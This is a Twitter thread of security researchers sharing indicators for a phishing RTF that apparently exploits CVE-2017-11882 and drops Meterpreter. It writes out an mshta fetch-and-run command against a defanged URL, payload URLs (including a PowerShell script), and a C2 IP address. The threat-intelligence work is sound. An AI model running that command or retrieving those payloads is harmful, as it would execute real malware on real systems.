重要人事變更通知.rtf (Important personnel changes notice) https://www.virustotal.com/#/file/a27ba1a86b85f53ceea51cac6450353163fb597de7abe589031572c67508ce1e/detection … mshta http://suo.]im/2boSoQ > http://www.energym.]co.]il/userfiles/file/a/h.txt >
https://raw.githubusercontent.]com/ds45z3/a/master/ #CVE201711882 #phishing #malware @James_inthe_box @GossiTheDog
-
Show this thread
-
https://raw.githubusercontent[.]com/ds45z3/a/master/fzx.png | https://raw.githubusercontent[.]com/ds45z3/a/master/sds.png | https://raw.githubusercontent[.]com/ds45z3/a/master/aaaaa.ps1
@githubpic.twitter.com/27BQXPULGm
2 replies 0 retweets 2 likesShow this thread -
Good finds..will start checkin :)
1 reply 0 retweets 1 like -
Replying to @James_inthe_box @securitydoggo and
Drops this beast: https://www.hybrid-analysis.com/sample/cc218b5afd1a7a6ca5da19eff3bddd01185d92de12a88341184064469f8684ae?environmentId=100 …
1 reply 0 retweets 1 like -
Replying to @James_inthe_box @securitydoggo and
Looks familiar...was
#meterpreter using this trick?pic.twitter.com/Ig51tKP3bo
1 reply 0 retweets 1 like -
Ohhh I remember that from someone's post...
1 reply 0 retweets 0 likes -
Ya me too..can't remember who/what though :(
1 reply 0 retweets 1 like -
Replying to @James_inthe_box @securitydoggo and
Ya this is
#meterpreter, c2 is https://censys.io/ipv4/103.86.86.71 …pic.twitter.com/7H1c8YzWwe
1 reply 0 retweets 1 like -
Was it
@ItsReallyNick or@bartblaze? Gah it's gonna bother me if I don't remember lol2 replies 0 retweets 0 likes
That one was Nick I believe, a while back. :D
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.